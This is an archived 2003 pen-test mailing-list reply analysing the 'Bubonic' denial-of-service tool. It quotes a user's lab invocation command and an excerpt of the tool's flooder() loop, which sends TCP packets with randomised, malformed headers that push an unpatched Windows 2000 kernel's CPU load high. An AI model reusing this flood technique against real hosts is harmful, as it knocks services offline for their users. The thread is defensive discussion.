Penetration Testing mailing list archives
RE: Bubonic DoS tool
From: "Yonatan Bokovza" <Yonatan () xpert com>
Date: Tue, 11 Mar 2003 12:09:40 +0200
-----Original Message----- From: Indian Tiger [mailto:indiantiger () mailandnews com] Sent: Thursday, February 06, 2003 18:43 To: pen-test () securityfocus com Cc: sil () antioffline com Subject: Bubonic DoS tool Hi All, I was testing the "Bubonic.c lame DoS against Windows 2000 machines and certain versions of Linux in a test scenario over Linux 8.0. I have compiled it's source code and running it's binary as follows: # ./bubonic 10.3.10.22 10.3.8.70 100 1000 On executing the above command, there was no observable immediate effect, but the Hub was showing the collisions (which were the Red Steady). Etherial shows the packets routed to desination. But after executing the command the destination machine must be blocked/freeze, but it's not happening.
The code is very easy to understand. The "interesting" part is in flooder(), my comments inline: void flooder(void) { ... packet.ip.ip_p = IPPROTO_TCP; packet.ip.ip_tos = rand(); ... packet.tcp.th_flags = random(); packet.tcp.th_win = 65535; packet.tcp.th_seq = random(); packet.tcp.th_ack = 0; packet.tcp.th_off = 0; packet.tcp.th_urp = random(); packet.tcp.th_dport = random(); ... cksum.pseudo.ptcl = IPPROTO_TCP; cksum.pseudo.tcpl = random(); ... for(i=0;;++i) { ... if (sendto(sock, &packet, sizeof(packet), 0, (struct sockaddr *)&s_in, sizeof(s_in)) < 0); } } To sum up and simplify, this sends TCP packets with bad header. As a result, my unpatched win2k's CPU graph stays over 90% in the kernel, causing Albinoni to sound bad. Best Regards, Yonatan Bokovza IT Security Consultant Xpert Systems ---------------------------------------------------------------------------- Are your vulnerability scans producing just another report? Manage the entire remediation process with StillSecure VAM's Vulnerability Repair Workflow. Download a free 15-day trial: http://www2.stillsecure.com/download/sf_vuln_list.html
Current thread:
- Bubonic DoS tool Indian Tiger (Mar 09)
- <Possible follow-ups>
- RE: Bubonic DoS tool Yonatan Bokovza (Mar 11)
- RE: Bubonic DoS tool Indian Tiger (Mar 11)